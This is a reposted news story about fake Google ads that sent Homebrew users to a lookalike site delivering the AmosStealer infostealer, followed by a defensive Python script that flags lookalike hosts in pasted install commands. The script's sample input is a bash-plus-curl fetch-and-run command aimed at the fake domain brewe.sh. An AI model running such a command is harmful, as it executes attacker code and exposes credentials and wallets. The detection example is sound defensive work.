Fake Google Ads Trick Mac Users To Install Homebrew Malware

by hubie, from SoylentNews (#6V03P)

Arthur T Knackerbracket has processed the following story:

Leveraging an attack vector that's been in play off and on for the last two decades, hackers are targeting Mac users with malware camouflaged as the popular Homebrew tool, and spreading it through deceptive Google ads.

Malicious actors are leveraging Google ads to distribute malware through a counterfeit Homebrew website. The campaign targets macOS and Linux users with an infostealer that compromises credentials, browser data, and cryptocurrency wallets.

Homebrew, a widely-used open-source package manager, enables users to manage software through a command line. Hackers recently exploited its popularity by creating a malicious Google ad.

The ad, spotted by developer Ryan Chenkie, appeared legitimate, displaying the correct URL for the Homebrew website, "brew.sh." However, users who clicked it were redirected to a fake website hosted at "brewe.sh."

The fake site mimicked Homebrew's installation process, tricking visitors into running a malicious command. While the legitimate Homebrew site also provides such installation commands, running the script from the fake site downloaded and executed malware, specifically AmosStealer.

AmosStealer, also known as "Atomic Stealer," is a macOS-focused infostealer sold to cybercriminals for $1,000 per month. It targets over 50 cryptocurrency wallets, browser-stored data, and desktop apps.

Previously, this malware has been used in similar campaigns, including fake Google Meet pages, making it a go-to tool for Apple-focused cyberattacks.

Homebrew's project leader, Mike McQuaid, expressed frustration with Google's inability to prevent such scams. While the malicious ad was taken down, McQuaid highlighted that similar incidents continue to occur due to insufficient oversight of sponsored ads.

Cybersecurity experts recommend avoiding sponsored links when searching for popular tools. Bookmarking official websites or accessing them directly can help users minimize risk.

[...] To stay safe from these types of attacks, make sure to double-check website URLs before clicking, stick to bookmarks for trusted sites, and steer clear of installing software from unfamiliar or sponsored links.

Google has taken down this one particular malicious ad. As history has proven, the danger from bad ads isn't gone, so Mac users - especially those using Homebrew - need to stay alert.
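
The advice to double-check URLs applies to the install command itself, before it is pasted into a terminal. The following is an added example, not part of the original story or of the Homebrew project: it extracts every URL from a pasted one-liner and flags hosts that closely resemble a trusted one, such as "brewe.sh" for "brew.sh". The allowlist contents, the function names and the sample command's path are assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts you have verified out of band (bookmark, project docs).
TRUSTED_HOSTS = {"brew.sh", "raw.githubusercontent.com"}
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.IGNORECASE)

def edit_distance(a, b):
    """Levenshtein distance using two rolling rows."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify_host(host):
    """Return (verdict, trusted host it imitates or None)."""
    try:
        # Punycode form makes non-ASCII homoglyph hosts visibly different.
        host = host.lower().rstrip(".").encode("idna").decode("ascii")
    except UnicodeError:
        return ("untrusted", None)
    if host in TRUSTED_HOSTS:  # exact match only; no wildcard subdomains
        return ("trusted", None)
    for good in sorted(TRUSTED_HOSTS):
        # Near-miss spelling, or the trusted name used as a leading label.
        if edit_distance(host, good) <= 2 or host.startswith(good + "."):
            return ("lookalike", good)
    return ("untrusted", None)

def audit_command(command):
    """Classify the host of every URL found in a pasted shell command."""
    findings = []
    for url in URL_RE.findall(command):
        try:
            # .hostname ignores any "user@" prefix placed before the real host.
            host = urlsplit(url).hostname or ""
        except ValueError:
            host = ""
        findings.append((host,) + classify_host(host))
    return findings

if __name__ == "__main__":
    # Constructed sample: the fake domain is from the article, the path is invented.
    pasted = '/bin/bash -c "$(curl -fsSL https://brewe.sh/install.sh)"'
    for host, verdict, imitates in audit_command(pasted):
        print(f"{host}: {verdict}" + (f" (resembles {imitates})" if imitates else ""))
```

A "trusted" verdict covers the host only: a shared host such as raw.githubusercontent.com serves content from any repository, so the path still has to be compared with the one published on the official site.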
